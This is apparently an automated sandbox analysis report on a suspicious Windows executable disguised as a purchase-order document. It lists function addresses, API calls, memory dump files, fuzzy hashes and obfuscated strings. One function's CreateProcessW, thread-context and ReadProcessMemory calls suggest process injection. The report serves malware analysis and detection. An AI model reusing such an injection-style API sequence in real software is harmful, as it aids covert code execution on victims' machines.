Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00401B71

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

Strings

@EXITCODE, xrefs: 00401B70, 00401BB5

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: @EXITCODE
API String ID: 580348202-3436989551
Opcode ID: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
Opcode Fuzzy Hash: 4145ab2d07bf19a354fff2d5031cf88e997e0915ee9c5273387e54f5573defd1
Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15

Function 0567A785 Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0567AF43
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0567AFD9
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0567AFFB
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 0567B304

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: 1255ff05a3a391cede1f89d856dff3995fd10eb49087fc5ba29911cf4b5d1436
Instruction ID: 2904b69ceadd198a18bb8d55c3702218391c538c1206fd8543dcad39c11d42ce
Opcode Fuzzy Hash: 1255ff05a3a391cede1f89d856dff3995fd10eb49087fc5ba29911cf4b5d1436
Instruction Fuzzy Hash: 3912BE24E18658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4E81CF5A

Function 0040B380 Relevance: 3.3, APIs: 2, Instructions: 255COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00430AEA

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E

Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C

Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415147
__lock_file.LIBCMT ref: 00415172

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99

Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6

__lock_file.LIBCMT ref: 00414EE4

Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A

__fclose_nolock.LIBCMT ref: 00414EEE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 717694121-0
Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D

Function 004098B8 Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 004098F6
DispatchMessageW.USER32(?), ref: 00409901

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Message$DispatchTranslate
String ID:
API String ID: 1706434739-0
Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A

Function 004098B6 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 004098F6
DispatchMessageW.USER32(?), ref: 00409901

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Message$DispatchTranslate
String ID:
API String ID: 1706434739-0
Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A

Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00410DEF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5

Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E

Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00401123

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ProcWindow
String ID:
API String ID: 181713994-0
Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E

Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08

Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3

WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: File$PointerWrite
String ID:
API String ID: 539440098-0
Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6

Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00401123

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ProcWindow
String ID:
API String ID: 181713994-0
Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1

Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00414E13

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589

Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54

Function 0567B784 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0567B799

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: faa183b4cb8013d63663046f5ed768319781147ed5fb20dea0933b97d5d9761a
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 04E09A7494010DEFDB00DFA4D5496AE7BB4EF04301F1005A1FD0596690DA309A548A62

Function 0567B788 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0567B799

Memory Dump Source

Source File: 00000000.00000002.1723983485.0000000005679000.00000040.00000020.00020000.00000000.sdmp, Offset: 05679000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5679000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 48619d3d31a1fcff5c2f0e4ddcb4b1a1b825ea51c069c4a6929f04d81e6e1c40
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 89E0E67494010DEFDB00DFB4D5496AE7BB4EF04301F1001A1FD01D2280D6309D50CB62

Non-executed Functions

Function 004045E0 Relevance: 81.9, Strings: 63, Instructions: 3193COMMON

Download Yara Rule

Strings

IqE, xrefs: 0040813B
0wE, xrefs: 0040506F
YlE, xrefs: 00407F73
rTG, xrefs: 004062E1
6tE, xrefs: 0040808D
+%F, xrefs: 00408167
^oE, xrefs: 00407F28
ApG, xrefs: 00408C6F
6MG, xrefs: 00406AFA
Z9G, xrefs: 00407581
PF, xrefs: 004047B2
R+F, xrefs: 00407FA5
O*F, xrefs: 004080D8
QbG, xrefs: 00406C81
vjE, xrefs: 00408656
PF, xrefs: 004073B1
NgF, xrefs: 00405374
LbF, xrefs: 00406540
BnE, xrefs: 00407EC4
_G, xrefs: 004058F9
_?G, xrefs: 00408898
6NF, xrefs: 00407398
3G, xrefs: 00405187
MdF, xrefs: 004057BE
$JG, xrefs: 00407415
*vG, xrefs: 00408DBB
~mE, xrefs: 00407EF6
7eF, xrefs: 00405611
_7G, xrefs: 0040759A
*"D, xrefs: 00408E07
b"D, xrefs: 00408DD9
^[F, xrefs: 0040462D
<HF, xrefs: 00408347
j)F, xrefs: 004082B3
`F, xrefs: 00406747
wG, xrefs: 00408BFD
4rE, xrefs: 00407DA4
DvE, xrefs: 0040503D
i}G, xrefs: 00408E30
ZPG, xrefs: 00406C0C
5CG, xrefs: 004089C9
lE, xrefs: 004055AD
&F, xrefs: 004059A8
GSG, xrefs: 004066FC
PIF, xrefs: 00408323
kQG, xrefs: 0040682D
pE, xrefs: 00407D40
}eE, xrefs: 004084D2
"DF, xrefs: 0040754F
<G, xrefs: 004049F5
.F, xrefs: 00407447
*F, xrefs: 004080C5
YtG, xrefs: 00408BEA
'HG, xrefs: 00407038
fH, xrefs: 004075DD
&F, xrefs: 0040598F
F)G, xrefs: 00407D8B
MuE, xrefs: 0040742E
'|G, xrefs: 00408DF7
K@G, xrefs: 004088AB
mE, xrefs: 00407DBD
*nF, xrefs: 0040595D
RnG, xrefs: 0040795C

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
API String ID: 0-4260964411
Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
